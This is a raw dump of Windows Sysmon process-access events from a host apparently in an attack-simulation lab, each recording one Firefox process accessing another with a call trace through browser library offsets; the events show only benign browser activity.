Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla 
Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:06.169{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla 
Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:07.505{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:02:07.505{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:18.639{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla 
Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000018468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:18.639{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla 
Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:18.639{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:18.639{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000018472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:19.920{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program 
Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000018471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:19.920{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla 
Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:19.920{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.748{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program 
Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000018486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.748{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla 
Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.748{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:02:20.670{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000018483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.670{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla 
Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.670{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla 
Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.529{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla 